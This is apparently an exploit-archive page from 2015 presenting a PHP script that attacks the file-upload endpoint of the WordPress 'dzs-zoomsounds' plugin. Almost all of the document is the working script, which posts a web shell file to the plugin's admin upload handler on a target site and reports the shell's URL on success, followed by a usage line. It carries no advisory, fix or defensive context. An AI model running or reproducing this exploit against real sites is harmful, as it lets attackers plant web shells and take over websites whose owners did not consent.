facebook facebook twitter rss

Wordpress zoom sounds plugin file Upload

Author: Moroccanwolf , Published: 03-06-2015
# Exploit Title: Wordpress zoom sounds plugin file Upload 
# Date: 30/05/2015
# Exploit Author: Moroccanwolf
# website Author : http://moroccanwolf.com
# Tested on: Linux

php code :

$site = $argv[1];



$name = "your shell.phtml";
$lol = curl_init("$site/wp-content/plugins/dzs-zoomsounds/admin/upload.php");
curl_setopt($lol, CURLOPT_POST, true);
curl_setopt($lol, CURLOPT_POSTFIELDS, array( 'file_field'=>"@$name"));
curl_setopt($lol, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($lol, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($lol, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36");
$exec = curl_exec($lol);
curl_close($lol);
if (preg_match('/success/i',$exec)){
echo "Success => http://$site/wp-content/plugins/dzs-zoomsounds/admin/upload/$name \n";
}else{

echo "Exploit Failed => $site\n";
}


usage : php script.php site

Like us on Facebook :